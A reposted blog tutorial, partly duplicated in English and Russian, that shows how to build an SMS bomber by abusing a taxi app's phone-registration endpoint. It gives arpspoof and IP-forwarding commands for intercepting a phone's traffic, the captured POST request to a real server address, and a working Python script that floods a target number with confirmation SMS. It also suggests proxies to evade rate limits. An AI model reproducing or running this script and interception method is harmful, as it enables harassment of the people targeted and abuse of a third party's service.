Today I will tell you how to write an SMS spammer. The Spammer-Grab script prompted me to write this article . Its essence is to force the service to send confirmation codes to the victim’s phone (I didn’t check its performance), if you believe people, it’s working.
I’ll say right away that we won’t be able to set the message text, but the essence of the spammer is not to deliver the text we need, but to get the person who is targeted by the spam attack.
Formulation of the problem:
In order to implement our plans, we need to find an android application in which there is a registration function by phone number with a confirmation code that will come in the form of SMS. Actually this is the most difficult thing to do in the whole scheme. Then you need to get an HTTP request with parameters that is sent for registration and write a small script that will make as many requests as we need.
Implementation of the conceived:
First, find an application that will meet our requirements. The first in which there is this functionality usually provide some kind of service. The first thing that came to mind was ordering a taxi. We go to Google Play in search, enter “Taxi” and start looking for the application that suits us. Those that are in the top are better not to take, pay attention to applications with a poor rating. Scrolling down a couple of screens we come across the application “ Taxi Magnet ”.
Install it on your phone. After we checked that the application’s functionality is suitable for us, the stage of traffic interception begins. You could try to do this using Android, but I don’t have root privileges, so I’ll go the other way. You can find your way to intercept traffic is not necessary to do like me. The first thing that came to my mind was ARP-spoofing. We connect android and laptop to our access point and conduct ARP-spoofing.
ARP-spoofing:
android ip: 192.168.10.107 (ip can recover)
router ip: 192.168.10.1 (ip can recover)
Transit packets must be allowed for an arp-spoofing attack.
Then we carry out the attack itself.
Now all the traffic from the android goes through us. Run Wireshark, select your interface, I have eth0. In the filter field, enter ip.addr == 192.168.10.107 and http (specify the ip of your android).
We return to the application and execute the registration request.
Go to Wireshark and see new HTTP requests. We draw attention to the POST request in which the Info field has a part of the URL that contains create-invite. We are trying to get the code several times to make sure that this is the request that we need. In order to be sure that we have found the right request, you can check it by hand using the Advanced REST client .
Consider the request in more detail. Right-click on it in the menu that appears, point it to Fallow and select HTTP Stream in the new list.
A window opens with information similar to this:
Let's look at what we need from this:
At this stage, we received all the data that we need (when testing the request, it fell out that the minimum interval of a pause between re-sending SMS was 10 seconds). Now you can start writing code. As a programming language, I chose python .
So we wrote our spammer. As you can see, there is nothing complicated about this. It can be improved by adding proxy support + a few more services so that spam goes without delay intervals, but this does not apply to this topic. I did not find this application on the first try. It was the third in a row. In applications with a good rating, there are IP blocking systems and limits for 15 minutes for sending SMS again. But if you have an extra hour, you can easily find a couple of such applications. I hope I did not waste my time and you were interested in reading it.
By the way, pay attention to the design of the application. According to the idea, all applications with such a design associated with a taxi will support multiple sending SMS without blocking. Since such applications are stamped by builders that comes with CRM for receiving taxi call orders. I know this for sure since work 5 years ago with taxi drivers who wanted their own CRM and an independent android application, at that time they had just such an application that could be compiled directly into CRM.
Taken from codeby
I’ll say right away that we won’t be able to set the message text, but the essence of the spammer is not to deliver the text we need, but to get the person who is targeted by the spam attack.
Formulation of the problem:
In order to implement our plans, we need to find an android application in which there is a registration function by phone number with a confirmation code that will come in the form of SMS. Actually this is the most difficult thing to do in the whole scheme. Then you need to get an HTTP request with parameters that is sent for registration and write a small script that will make as many requests as we need.
Implementation of the conceived:
First, find an application that will meet our requirements. The first in which there is this functionality usually provide some kind of service. The first thing that came to mind was ordering a taxi. We go to Google Play in search, enter “Taxi” and start looking for the application that suits us. Those that are in the top are better not to take, pay attention to applications with a poor rating. Scrolling down a couple of screens we come across the application “ Taxi Magnet ”.
Install it on your phone. After we checked that the application’s functionality is suitable for us, the stage of traffic interception begins. You could try to do this using Android, but I don’t have root privileges, so I’ll go the other way. You can find your way to intercept traffic is not necessary to do like me. The first thing that came to my mind was ARP-spoofing. We connect android and laptop to our access point and conduct ARP-spoofing.
ARP-spoofing:
android ip: 192.168.10.107 (ip can recover)
router ip: 192.168.10.1 (ip can recover)
Transit packets must be allowed for an arp-spoofing attack.
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
Code:
arpspoof -i eth0 -t [ip андройда] [ip роутера]
arpspoof -i eth0 -t [ip роутера] [ip андройда]
-i — указывает интерфейс, подключенный к локальной сети
-t — указывает IP-адрес хоста, arp-кэш которого требуется «отравить».
Now all the traffic from the android goes through us. Run Wireshark, select your interface, I have eth0. In the filter field, enter ip.addr == 192.168.10.107 and http (specify the ip of your android).
We return to the application and execute the registration request.
Go to Wireshark and see new HTTP requests. We draw attention to the POST request in which the Info field has a part of the URL that contains create-invite. We are trying to get the code several times to make sure that this is the request that we need. In order to be sure that we have found the right request, you can check it by hand using the Advanced REST client .
Consider the request in more detail. Right-click on it in the menu that appears, point it to Fallow and select HTTP Stream in the new list.
A window opens with information similar to this:
Code:
POST /est-taxi/create-invite/1.0/ HTTP/1.1
Content-Length: 103
Content-Type: application/x-www-form-urlencoded
Host: 5.9.150.148:8200
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
invite={"phone-number":"+XXXXXXXXXXXX","application-acronym":"TAXI_MAGNIT"}
HTTP/1.1 200 OK
Accept-Charset: UTF-8
Content-Type: text/plain; charset=UTF-8
Content-Length: 29
Connection: keep-alive
{"result":{"result-state":0}}
Code:
Тип запроса: POST
URL на который будет отправляться запрос: http://5.9.150.148:8200/est-taxi/create-invite/1.0/
Обязательные параметры которые требуется передать: invite={"phone-number":"+XXXXXXXXXXXX","application-acronym":"TAXI_MAGNIT"}
Ответ от сервера в случае успешной отправки: {"result":{"result-state":0}}
Python:
вайте разберем что из этого нам нужно:
Код:
Тип запроса: POST
URL на который будет отправляться запрос: http://5.9.150.148:8200/est-taxi/create-invite/1.0/
Обязательные параметры которые требуется передать: invite={"phone-number":"+XXXXXXXXXXXX","application-acronym":"TAXI_MAGNIT"}
Ответ от сервера в случае успешной отправки: {"result":{"result-state":0}}
На этом этапе мы получили все данные которые нам нужна (при тестировании запроса было вывалено что минимальный промежутка паузы между повторной отправкой SMS 10 сек). Теперь можно приступить к написанию кода. В качестве языка программирования я выбрал python.
Python:
#!/usr/bin/python
# coding=utf-8
import requests, argparse, json, time
# Функция обработки передаваемых параметров
def options():
parser = argparse.ArgumentParser(prog='SMSSpammer', description="The script sends spam messages via SMS",
epilog='SMS Spammer script by n3d.b0y for Grey Section')
parser.add_argument('--number', '-n', required=True, help='Phone number (example: 79006403861)')
parser.add_argument('--limit', '-l', type=int, default=3,
help='Limit SMS (default: 3)')
parser.add_argument('--delay', '-d', type=int, default=20,
help='Delay time in seconds (default: 20)')
return parser.parse_args()
# Отправка POST запроса с параметрами. Функция принимает номер телефона формата 79006403861.
def post_requests(number):
r = requests.post('http://5.9.150.148:8200/est-taxi/create-invite/1.0/',
data={'invite': '{"phone-number":"+' + number + '","application-acronym":"TAXI_MAGNIT"}'})
return json.loads(r.text)
def main():
# Получаем переданные параметры
params = options()
inc = 0
# Цикл будет делать столько итераций сколько мы передали в партере limit
while inc < params.limit:
# Передаем номер телефона и отправляем POST запрос
response = post_requests(params.number)
# Если ответ пришел положительный выводи OK если с ошибкой выведем Error
if int(response['result']['result-state']) == 0:
print '+' + params.number + ' - OK'
else:
print '+' + params.number + ' - Error'
inc += 1
# Делаем пазу перед следующим запросом
time.sleep(params.delay)
if __name__ == '__main__':
main()
By the way, pay attention to the design of the application. According to the idea, all applications with such a design associated with a taxi will support multiple sending SMS without blocking. Since such applications are stamped by builders that comes with CRM for receiving taxi call orders. I know this for sure since work 5 years ago with taxi drivers who wanted their own CRM and an independent android application, at that time they had just such an application that could be compiled directly into CRM.
Taken from codeby
No comments:
Post a Comment